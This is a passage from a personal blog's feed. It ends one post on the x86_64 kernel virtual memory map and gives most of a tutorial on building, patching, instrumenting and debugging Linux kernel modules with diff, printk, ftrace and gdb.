href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/mm/kaslr.c#L41">vaddr_end</a></code>, which along with <code>vaddr_start</code> marks the virtual address range for Kernel Address Space Layout Randomization (KASLR).</p><p><strong>Line 32</strong>: Yep, unused region. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/theresmore.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="480" height="270"></figure><p><strong>Line 33</strong>: Enabled with <code>CONFIG_X86_ESPFIX64=y</code>, this region is used to, and I honestly don&apos;t blame you if this makes no sense yet, fix issues with returning from kernelspace to userspace when using a 16-bit stack...</p><p>Again, the comments can be insightful here, so feel free to take a gander at the implementation in <code><a href="https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/espfix_64.c">arch/x86/kernel/espfix_64.c</a></code>.</p><p><strong>Line 34</strong>: Another unused region.</p><p><strong>Line 35</strong>: Defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L159">EFI_VA_START</a></code>, this region unsurprinsgly is used for EFI related stuff. This is the same Extensible Firmware Interface we touch on in the (currently unfinished, oops) Linternals series on <a href="https://sam4k.com/linternals-the-modern-boot-process-part-1/">The (Modern) Boot Process</a>.</p><p><strong>Line 36</strong>: More unused memory.</p><p><strong>Line 37</strong>: This region is used as a 1:1 mapping of the kernel&apos;s text section, defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_64_types.h#L50">__START_KERNEL_map</a></code>. As we mentioned before, the kernel image is formatted like any other ELF, so has the same sections.</p><p>This is where we find all the functions in your kernel image, which is handy for debugging! In this instance, if we&apos;re debugging an <code>x86_64</code> target we can get a rough idea of what we&apos;re looking atjust from the address.</p><p>If we see the <code>0xffffffff8.......</code> then we know we&apos;re looking at the text section!</p><p><strong>Line 38</strong>: Any dynamically loaded &#xA0;(think <code>insmod</code>) modules are mapped into this region, which sits just other the kernel text mapping as we can see in the <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L144">definition</a>:</p><pre><code class="language-C">#define MODULES_VADDR (__START_KERNEL_map + KERNEL_IMAGE_SIZE)</code></pre><p><strong>Line 39</strong>: Defined by <code><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/fixmap.h#L151">FIXADDR_START</a></code>, this region is used for &quot;fix-mapped&quot; addresses. These are special virtual addresses which are set/used at compile-time, but are mapped to physical physical memory at boot. </p><p>The <code><a href="https://elixir.bootlin.com/linux/v5.17.6/source/include/asm-generic/fixmap.h#L30">fix_to_virt()</a></code> family of functions are used to work with these special addresses.</p><p><strong>Line 40</strong>: We actually snuck this in to our last part! To recap, this region is: </p><blockquote>a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn&apos;t require elevated privileges and hence the whole user &#xA0;-&gt; kernel mode context switch. Suffice to say it&apos;s defunct now, and calls to vsyscall table still work for compatibility, but now actually trap and act as a normal syscall</blockquote><p><strong>Line 41</strong>: Our final unused memory region!</p><hr><ol><li>The eagle-eyed will note there&apos;s a couple of diagrams in <a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt">mm.txt</a>, one for 4-level page tables and one for 5-level. We&apos;ll touch on what this means in the next section, for now just know that 4-level is more common atm </li><li>Specifically, depending on the arch, the most significant N bits are always 0 for userspace and 1 for kernelspace; on <code>x86_64</code> this is bits <code>48-63</code>. This leaves 2<sup>48</sup> bits of addressing for both userspace and kernelspace (128TB) </li><li><a href="https://en-academic.com/dic.nsf/enwiki/1553430">https://en-academic.com/dic.nsf/enwiki/1553430</a></li><li><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html</a></li><li><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead</a></li><li><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">https://www.kernel.org/doc/html/latest/dev-tools/kasan.html</a></li><li><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90</a></li></ol><h3 id="wrapping-up">Wrapping Up</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/05/thatstheend.gif" class="kg-image" alt="Linternals: The Kernel Virtual Address Space" loading="lazy" width="500" height="250"></figure><p>We did it! We&apos;ve covered all the regions described in the kernel x86_64 4-page (we&apos;ll get on that in the next section) virtual memory map! </p><p>Hopefully there was enough detail here to provide some interesting context, but not so much that you might have well been reading the source. For the more curious, we&apos;ll be focusing more on implementation details in the next part.</p><h4 id="digging-deeper">Digging Deeper </h4><p>If you&apos;re interested in exploring some of these concepts yourself, don&apos;t be scared away by the source! Diving into some of the <code>#define</code>&apos;s and symbols we&apos;ve mentioned so far and rooting around can be a good way to dive in. <a href="https://elixir.bootlin.com/linux/latest/source">bootlin&apos;s Elixr Cross Referencer</a> is easy to use and you can jump about the source in your browser.</p><p>Additionally, playing around with <a href="https://github.com/osandov/drgn">drgn</a> (live kernel introspection), <a href="https://www.sourceware.org/gdb/">gdb</a> (we covered getting setup in <a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">this post</a>) and coding is a fun way to get stuck in and explore these memory topics.</p><h2 id="next-time">Next Time!</h2><p>After 3 parts, we&apos;ve laid a solid foundation for our understanding of what virtual memory is and the role it plays in Linux; both in the userspace and kernelspace.</p><p>Armed with this knowledge, we&apos;re in a prime position to begin digging a little deeper and getting into some real Linternals as we take a look at how things are actually implemented.</p><p>Next time we&apos;ll begin to take a look, at both a operating system and hardware level, how this all works. I&apos;m not going to pretend I know how many parts that&apos;ll take!</p><p>Down the line I would also like to close this topic by bringing everything we&apos;ve learnt together by covering some exploitation techniques and mitigations RE virtual memory.</p><p>Thanks for reading!</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Patching, Instrumenting & Debugging Linux Kernel Modules]]></title><description><![CDATA[An introductory look into patching, instrumenting and debugging Linux kernel modules.]]></description><link>https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/</link><guid isPermaLink="false">61faeaa97742d008b38dcee4</guid><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 15 Apr 2022 16:13:50 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/02/computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/02/computer.gif" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><p>So not long ago I found myself having to test a fix in a Linux networking module as part of the coordinated vulnerability disclosure <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">I posted about</a> recently. </p><p>Maybe my Google-fu wasn&apos;t on point, but it wasn&apos;t immediately clear what the best approach was, so hopefully this post can provide some direction for anyone interested in quickly patching, or instrumenting, Linux kernel modules.</p><p>Now, if we&apos;re talking about patching and instrumentation in the Linux kernel, I&apos;d be remiss not to at least touch on some debugging basics as well, right? So hopefully between those three topics we should be able to cover some good ground in this post!</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2757;</div><div class="kg-callout-text">This post ended up being quite long, so if you like a narrative and hearing the why behind the how, please continue! But for brevity I&apos;ve also included the essentials my repo over at <a href="https://github.com/sam4k/linux-kernel-resources">sam4k/linux-kernel-resources</a>.</div></div><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#preamble">Preamble</a>
<ul>
<li><a href="#kernel-module">Kernel Module?</a></li>
</ul>
</li>
<li><a href="#getting-setup">Getting Setup</a>
<ul>
<li><a href="#building-the-kernel">Building The Kernel</a></li>
<li><a href="#module-patching">Module Patching</a></li>
<li><a href="#shortcuts-alternatives">Shortcuts &amp; Alternatives</a>
<ul>
<li><a href="#minimal-configs">Minimal Configs</a></li>
<li><a href="#skip-building-altogether">Skip Building Altogether</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#getting-stuck-in">Getting Stuck In</a>
<ul>
<li><a href="#patch-diffs">Patch Diffs</a></li>
<li><a href="#instrumentation">Instrumentation</a></li>
<li><a href="#debugging">Debugging</a>
<ul>
<li><a href="#gdb-debugging-stub">GDB Debugging Stub</a></li>
<li><a href="#vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</a></li>
<li><a href="#loadable-modules">Loadable Modules</a></li>
<li><a href="#misc-gdb-tips">Misc GDB Tips</a></li>
<li><a href="#other-stuff">Other Stuff</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#faq">FAQ</a></li>
<li><a href="#postamble">Postamble</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="preamble">Preamble</h2><p>This post is written in the context of kernel security research, which might deviate from other use cases, so bear that in mind when reading this post.</p><p>When finding a vuln, or looking into an existing bug, I&apos;ll want to set up a representative environment to play around with it. This basically just means setting up an Ubuntu VM (representative of a typical in-the-wild box) with a vulnerable kernel version.</p><p>The only real hard requirement I assume, is that you&apos;re doing your kernel stuff in a VM; as this&apos;ll make debugging the kernel a lot easier down the line.</p><h3 id="kernel-module">Kernel Module?</h3><p>In the early, early days (&lt;1995) the Linux kernel was truly monolthic. Any functionality needed to be built into the base kernel at build time and that was that. </p><p>Since then, Loadable Kernel Modules (LKMs) have improved the flexibility of the Linux kernel, allowing features to be implemented as modules which can either be built into the base kernel or built as separate, loadable modules.</p><p>These can be loaded into, and unloaded from, kernel memory on demand without requiring a reboot or having to rebuild the kernel. Nowadays LKMs are used for device drivers, filesystem drivers, network drivers etc.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/ready_to_roll.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="270"></figure><hr><ol><li><a href="https://tldp.org/HOWTO/Module-HOWTO/x73.html">The Linux Documentation Project: Introduction to Linux Loadable Kernel Modules</a></li><li><a href="https://wiki.archlinux.org/title/Kernel_module">ArchWiki: Kernel Module</a></li></ol><h2 id="getting-setup">Getting Setup</h2><p>Alright, let&apos;s get things setup shall we? In this section I&apos;ll talk about how to get to a position where we&apos;re able to make changes to a kernel module, rebuild it and install it.</p><p>There are probably a lot of different ways to do this - some quicker, some hackier and some context specific. While I&apos;ll touch on some shortcuts in the next section, in my experience the easiest way to avoid a headache is just starting from a fresh kernel build.</p><p>So that&apos;s what we&apos;re going to do! Buckle up, let&apos;s see if I can keep this brief. First I&apos;ll quickly cover how to build the kernel and then move onto patching specific modules.</p><h3 id="building-the-kernel">Building The Kernel</h3><p>First things first, make sure you grab the necessary dependencies for building the kernel:</p><pre><code>$ sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves</code></pre><p>With that sorted, <strong>download</strong> the kernel version you&apos;re wanting to play with from <a href="https://kernel.org">kernel.org</a>:</p><pre><code class="language-sh">$ wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.17.tar.xz</code></pre><p>If you&apos;re not sure what kernel version to go for, just pick one closest to your current environment, which you can check via the cmd <code>uname -r</code>; don&apos;t worry about patch versions or anything past the first two number, we ain&apos;t got no time for that.</p><p>Next let&apos;s <strong>extract </strong>the kernel source into our current dir and <code>cd</code> into it after:</p><pre><code class="language-sh">$ tar -xf linux-5.17.tar.xz &amp;&amp; cd linux-5-17</code></pre><p>Now we need to <strong>configure</strong> our kernel. The kernel configuration is stored in a file named <code>.config</code>, in the root of the kernel source tree (aka where we just <code>cd</code>&apos;d into).</p><p>On Debian-based distros you should be able to find your config at <code>/boot/config-$(uname -r)</code> or similar; on my Arch box it&apos;s compressed at <code>/proc/config.gz</code>:</p><pre><code class="language-sh">$ cp /boot/config-$(uname -r) .config</code></pre><p>This file contains all the configuration options for your kernel; if you want to play around with these you can use <code>make menuconfig</code> to tweak your config. Speaking of <strong>tweaking your config</strong>, you may want to make some changes:</p><ul><li>On Ubuntu, you&apos;ll likely encounter some key related issues if you try to build using their config, so set the following config values in your <code>.config</code>: <code>CONFIG_SYSTEM_TRUSTED_KEYS=&quot;&quot;</code>, <code>CONFIG_SYSTEM_REVOCATION_KEYS=&quot;&quot;</code></li><li>Given there may be patching and debugging involved down the line, it might be worth taking the opportunity to enable debugging symbols with <code><a href="https://cateee.net/lkddb/web-lkddb/DEBUG_INFO.html">CONFIG_DEBUG_INFO</a>=Y</code> &#xA0;&amp;&amp; <code><a href="https://cateee.net/lkddb/web-lkddb/GDB_SCRIPTS.html">CONFIG_GDB_SCRIPTS</a>=Y</code> ; you can enable this easily by using the helper <code>./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS</code></li></ul><p>With <code>.config</code> ready, let&apos;s crack on. By using <code>oldconfig</code> instead of <code>menuconfig</code> we can avoid the ncurses interface and just update the kernel configuration using our <code>.config</code> (it just means we may get some prompts during the make process for new options):</p><pre><code class="language-sh">$ make oldconfig</code></pre><p>Now we&apos;re ready to start <strong>building</strong> the kernel, and depending on your system and the <code>.config</code> we&apos;ve copied over, this can <em>take a while</em>, so fire all CPU cores:</p><pre><code class="language-sh">$ make -j$(nproc)</code></pre><p>Next up, we can start installing our freshly built kernel. First up are the modules, which will typically be installed to <code>/lib/modules/&lt;kernel_vers&gt;</code>. So, to install our modules we&apos;ll go ahead and run:</p><pre><code class="language-sh">$ sudo make modules_install</code></pre><p>Finally we&apos;ll install the kernel itself; the follow command will do all the housekeeping required to let us select the new kernel from our bootloader:</p><pre><code class="language-sh">$ sudo make install </code></pre><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/mission_accomplished.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="202"></figure><p>And voila! Just like that we&apos;ve built our Linux kernel from source, nabbing the config from our current environment, and we&apos;re ready to do some tinkering! </p><h3 id="module-patching">Module Patching</h3><p>Okay, now we have a clean environment to work with and can start tinkering! Because we&apos;ve built the kernel from source, we know we&apos;re building our patched modules in the exact same development environment as the kernel we&apos;re installing them into.</p><p>While the initial build can be lengthy, it&apos;s straightforward and we avoid the headache of out-of-tree module taints, signing issues and other finicky version-mismatch related issues.</p><p>Instead, we can make whatever changes we intend to make to our module and then run much the same commands we did during the initial install, only targeting our patched module(s). For example, for CVE-2022-0435 I tested a patches in <code>net/tipc/monitor.c</code>, so to rebuild and install my patched module I&apos;d simply run:</p><pre><code>$ make M=net/tipc
$ sudo make M=net/tipc modules_install</code></pre><p>I&apos;m then able to go ahead and re/load <code>tipc</code> and we&apos;re good to go! Easy as that.</p><h3 id="shortcuts-alternatives">Shortcuts &amp; Alternatives</h3><p>As some of you may already be painfully aware, building a full-featured kernel can actually take some time, especially in a VM with limited resources. </p><h4 id="minimal-configs">Minimal Configs</h4><p>So to speed things up dramatically, if you&apos;re familiar with the module(s) you&apos;re going to be looking at, a more efficient approach is to start from a minimal config and enable the bare minimum features required for your testing environment.</p><p>For example <code>$ make defconfig</code> will generate a minimal default config for your arch, and then you can use <code>$ make menuconfig</code> to make further adjustments.</p><h4 id="skip-building-altogether">Skip Building Altogether</h4><p>Depending on your requirements, you can just avoid building altogether:</p><ul><li>if you just want to do some debugging, you could pull debug symbols from your distribution repo (see section on symbols below)</li><li>you may be able to fetch source from your distro repos, where you can then patch and build modules from there</li><li>if you don&apos;t need to worry about module signing/taint, and you&apos;re happy to get messy, there&apos;s hackier ways to do all this too</li></ul><h2 id="getting-stuck-in">Getting Stuck In</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/fun_begins.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="230"></figure><p>Now that we&apos;ve got our kernel dev environment setup, it&apos;s time to get stuck in! I&apos;ll briefly touch on generating patches, because why not, and instrumentation (though I&apos;m not as familiar with this topic) before finally covering how we can debug kernel modules.</p><h3 id="patch-diffs">Patch Diffs</h3><p>Disclaimer, if you want to submit any patches to the kernel formally, then definitely check out this <strong><em>comprehensive</em></strong> kernel doc on the various dos &amp; donts of <a href="https://www.kernel.org/doc/html/latest/process/submitting-patches.html">submitting patches</a>.</p><p>That said, we&apos;re just playing around here! Plus I don&apos;t think it actually mentions the command in that particular doc. Anyway, I digress, we can run the following commands to generate a simple patch diff between two files:</p><pre><code class="language-sh">$ diff -u monitor.c monitor_patched.c 
--- monitor.c   2021-03-11 13:19:18.000000000 +0000
+++ monitor_patched.c 2022-04-06 19:25:27.449661568 +0100
@@ -503,8 +503,10 @@
        /* Cache current domain record for later use */
        dom_bef.member_cnt = 0;
        dom = peer-&gt;domain;
-       if (dom)
+       if (dom) {
+               printk(&quot;printk debugging ftw!\n&quot;)
                memcpy(&amp;dom_bef, dom, dom-&gt;len);
+       }
 
        /* Transform and store received domain record */
        if (!dom || (dom-&gt;len &lt; new_dlen)) {
</code></pre><p>Where <code>-u</code> tells <code>diff</code> to use the unified format, which provides us with 3 lines of unified context (this is the standard, but N lines of context can be specified with <code>-u N</code>). </p><p>This unified format provides a line-by-line comparison of the given files, letting us know what&apos;s changed from one to another:</p><ol><li>Line 2 is part of the patch header, prefixed with <code>---</code>, and tells us the original file, date created and timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li><li>Line 3 is also part of the header, prefixed with <code>+++</code>, and tells us the new file, date created and<sup> </sup>timezone offset from UTC (thanks <a href="https://twitter.com/kfazz01">@kfazz01</a>!)</li><li>Line 4, encapsulated by <code>@@</code>, defines the start of &quot;hunk&quot; (group) of changes in our diff; sticking to <code>-</code> for original and <code>+</code> for new, <code>-503,8</code> tells us this hunk is starting from line 503 in <code>monitor.c</code> and shows 8 lines. <code>+503,10</code> means the hunk also starts from line 503 in <code>monitor_patched.c</code> but shows 10 lines (which checks out as we removed 1 and added 3).</li><li>Lines 5-7 &amp; 13-15 are our 3 lines of unified context, just to give us some idea of what&apos;s going on around the lines we&apos;ve changed</li><li>Lines 8-12 then are, by process of elimination, the lines we&apos;ve changed. Changing things up, now <code>-</code> prefixes lines we&apos;ve removed (i.e in <code>monitor.c</code> but no longer in <code>monitor_patched.c</code>) and <code>+</code> prefixes lined we&apos;ve added to <code>monitor_patched.c</code></li></ol><p>So there&apos;s a quick ramble on patch diffs. It&apos;s as easy as that. We can also do diffs on entire directly/globs of files:</p><pre><code>$ diff -Naur net/tipc/ net/tipc_patched/</code></pre><p>Where <code>-N</code> treats missing files as empty, <code>-a</code> treats all files as text, <code>-r</code> recursively compares subdirs and <code>-u</code> is the same as before. </p><p>If we want to save these patches and apply them down the line, we can redirect the output into a file and then apply it to the original:</p><pre><code class="language-sh">$ diff -u monitor.c monitor_patched.c &gt; monitor.patch
$ patch -p0 &lt; monitor.patch 
patching file monitor.c
</code></pre><p>When we pass <code>patch</code> a patch file, it expects and argument <code>-pX</code> where <code>X</code> defines how many directory levels to strip from our patch header. Our was like <code>--- monitor.c</code>, so we include <code>-p0</code> as there&apos;s 0 dir levels to strip!</p><h3 id="instrumentation">Instrumentation</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/printk-1.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="498" height="276"></figure><p>Memes aside, <code>printf()</code> does the job in your own C projects, <code>printk()</code> is just the kernel-land equivalent<sup>[1]</sup> and sometime&apos;s a cheeky <code>printk(&quot;here&quot;)</code> is all you need.</p><p>Using the patching approach we mentioned above, sometimes the easiest way to debug or trace execution isn&apos;t to set up some complication framework but simply to sprinkle in some <code>printk()</code>&apos;s and rebuild your module and voila! </p><p>And well, that&apos;s the extent of my practical kernel instrumentation knowledge. But I&apos;d feel bad making a whole section just to meme <code>printk()</code>, so while I can&apos;t expand on them fully, here are a couple of other avenues for kernel instrumentation:</p><h4 id="kprobes">kprobes</h4><blockquote>kprobes enable you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit &#x2014; <a href="https://www.kernel.org/doc/html/latest/trace/kprobes.html">kernel.org/doc</a></blockquote><p>kprobes provide a fairly comprehensive API for your instrumentation needs, however the flip side is that is does require some light kernel development skills (perhaps a good intro task to kernel development??) to get stuck in. </p><h4 id="ftrace">ftrace</h4><p>ftrace, or function tracer, is &quot;an internal tracer designed to help out developers and designers of systems to find what is going on inside the kernel [...] although ftrace is typically considered the function tracer, it is really a frame work of several assorted tracing utilities.&quot; <sup><a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">[2]</a></sup>.</p><p>ftrace is actually quite interesting, as unlike similarly named (but not to be confused) tools like <code>strace</code>, there is no usermode binary to interact with the kernel component. Instead, users interact with the tracefs file system.</p><p>For the sake of brevity, if you&apos;re interested in checking out ftrace, here is an introductory guide by Gaurav Kamathe on opensource.com:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://opensource.com/article/21/7/linux-kernel-ftrace"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Analyze the Linux kernel with ftrace</div><div class="kg-bookmark-description">An operating system&#x2019;s kernel is one of the most elusive pieces of software out there. It&#x2019;s always there running in the background from the time your system gets turned on.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://opensource.com/themes/osdc/assets/img/favicons/favicon.ico" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"><span class="kg-bookmark-author">Supported by Red Hat</span><span class="kg-bookmark-publisher">Gaurav Kamathe</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opensource.com/sites/default/files/lead-images/linux_keyboard_desktop.png" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules"></div></a></figure><h4 id="ebpf">eBPF??</h4><p>Okay, this might be a bit of a rogue one. Quick disclaimer being I&apos;ve unfortunately not found the time, despite it being high up on my list, to properly play with eBPF. So touch any statements RE eBPF features with a pinch of salt! </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/idkanything.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="480" height="270"></figure><p>That said, to summarise (I think I got this bit right), eBPF is a kernel feature introduced in 4.x that allows privileged usermode applications to run sandboxed code in the kernel. </p><p>I&apos;m particularly interested in seeing the limits of its application, particularly in spaces such as detection, rootkits and debugging; for something original focused around networking. </p><p>Although, RE instrumentation &amp; debugging, I&apos;m not sure how much extra mileage eBPF would be able to provide. The eBPF bytecode runs in a sandboxed environment within the kernel, and as far as I&apos;m aware can&apos;t alter kernel data.</p><p>That said, from a instrumentation perspective we can still do some interesting tracing. For example, we can attach to one of our kprobes and read function args &amp; ret values.</p><p>Anyway, perhaps just some food-for-thought, but I&apos;ll stop rambling! I&apos;ll drop a couple of links below to existing publications on eBPF instrumentation/debugging <sup>[3]</sup>.</p><hr><ol><li>The reason it&apos;s <code>printk()</code>, and not the classic <code>printf()</code> we usually find in C, as the C standard library isn&apos;t available in kernel mode; so the <code>k</code> in <code>printk()</code> let&apos;s us know we&apos;re using the kernel-land implementation.</li><li><a href="https://www.kernel.org/doc/Documentation/trace/ftrace.txt">https://www.kernel.org/doc/Documentation/trace/ftrace.txt</a></li><li><a href="https://www.usenix.org/sites/default/files/conference/protected-files/lisa18_slides_babrou.pdf">Debugging Linux issues with eBPF</a> (USENIX LISA18) &#xA0;</li><li><a href="https://elinux.org/images/d/dc/Kernel-Analysis-Using-eBPF-Daniel-Thompson-Linaro.pdf">Kernel analysis using eBPF</a></li></ol><h3 id="debugging">Debugging</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/04/noidea.gif" class="kg-image" alt="Patching, Instrumenting &amp; Debugging Linux Kernel Modules" loading="lazy" width="270" height="187"></figure><p>Working with something as complex as the Linux kernel, you&apos;ll inevitably find yourself resonating with the above gif, and that&apos;s alright! That said, getting a smooth debugging workflow setup can go a long ways to alleviating the confusion.</p><p>Setting up good debugging environment means you can set breakpoints, allowing you to pause kernel execution at moments of interest, as well as inspect, and even change, registers and memory! There&apos;s also scope for scripting various elements of this process too.</p><h4 id="gdb-debugging-stub">GDB Debugging Stub</h4><p>Remember about 2000 words ago I mentioned the only real assumption I was going to make is that you&apos;re doing your kernel testing/shenanigans in a VM? </p><p>It turns out that trying to debug the kernel you&apos;re running is... tricky. So besides snapshots and various other QoL features, a big pro to using VMs is the ability to remotely debug them at the kernel-level from our host (or another guest) using a debugger<sup><a href="https://www.sourceware.org/gdb/">[1]</a></sup>.</p><p>The debugger in question, gdb, or the GNU Project debugger<sup><a href="https://www.sourceware.org/gdb/">[1]</a></sup>, is a portable debugger that runs on many UNIX-like systems and is basically the defacto Linux kernel debugger (@ me). </p><p>Thanks to gdbstubs<sup><a href="https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html">[2]</a></sup>, sets of files included by the virtualisation software (VMWare, QEMU etc.) in guests, we&apos;re able to remotely debug our guest kernel with much the same functionality we&apos;d expect from userland debugging: breakpoints, viewing/setting registers and memory etc. etc.<sup>[3]</sup></p><p>I&apos;ll use this opportunity to plug <a href="https://gef.readthedocs.io/en/master/">GEF</a> (GDB Enhanced Features) cos let&apos;s not forget gdb is like 36 years old and your boy needs some colours up in his CLI. Beyond just colours, gef has a great suite of quality-of-life features that just make the debugging workflow easier.</p><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x2757;</div><div class="kg-callout-text">Note that future GDB snippets will be using GEF, definitely not in an attempt to convert you, so don&apos;t be scared by the `gef&#x27A4;` prompt; it&apos;s all the same program.</div></div><p>Anyway, enough rambling, let&apos;s take a look at getting kernel debugging setup on our VM:</p><ol><li><strong>Enable the gdbstub on your guest</strong><sup><a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm">[4]</a></sup>; typically this will listen on an interface:port you specify on the host. E.g. QEMU by default listens on <code>localhost:1234</code>. </li><li>Now on your host, or another guest that can reach the listening interface on your host, you can spin up and gdb<sup>[5]</sup> and connect:</li></ol><pre><code class="language-sh">$ gdb
...
gef&#x27A4; target remote :1234 
gef&#x27A4; # you can omit localhost, so just :1234 works too</code></pre><p>And just like that, you&apos;re now remotely debugging the Linux kernel - awesome, right? Except if you&apos;ve just fired up gdb and connected like the snippet above, you&apos;re probably seeing something like this:</p><pre><code>gef&#x27A4;  target remote :12345
Remote debugging using :12345
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the &quot;file&quot; command.
0xffffffffa703f9fe in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500;&#x2500; registers &#x2500;&#x2500;&#x2500;&#x2500;
[!] Command &apos;context&apos; failed to execute properly, reason: &apos;NoneType&apos; object has no attribute &apos;all_registers&apos;
gef&#x27A4;  info reg
...
rip            0xffffffffa703f9fe  0xffffffffa703f9fe

</code></pre><p>Huh, so we&apos;ve connected and it looks like we&apos;ve trapped execution at <code>0xffffffffa703f9fe</code>, but gdb has no idea where we are... This does not bode well for a productive debugging session; so let&apos;s look at how to fix that!</p><h4 id="vmlinux-symbols-kaslr">vmlinux, symbols &amp; kaslr</h4><p>So although our gdb has managed to make contact with the gdbstub on our guest, it&apos;s far from omnipotent. It can interact with memory and read the registers, as it understands the architecture, however it doesn&apos;t know about the kernel&apos;s functions and data structures.</p><p>Unfortunately for us that&apos;s the whole reason we&apos;re doing kernel debugging, to debug the kernel! Luckily though, it&apos;s fairly simple to tell gdb everything it needs to know.</p><p>If you&apos;ve you&apos;ve read my <a href="https://sam4k.com/linternals-the-modern-boot-process-part-2/">Linternals: The (Modern) Boot Process [0x02]</a>, you&apos;ll know that there&apos;s file called <code>vmlinux</code> containing the decompressed kernel image as a statically linked ELF. Just like debugging a userland binary, we can load this <code>vmlinux</code> into gdb and it&apos;s able to interpret it without any dramas.</p><p>Importantly, though, just like userland debugging we want to make sure we load a <code>vmlinux</code> with debugging symbols included, there&apos;s a couple options for this:</p><!--kg-card-begin: markdown--><ul>
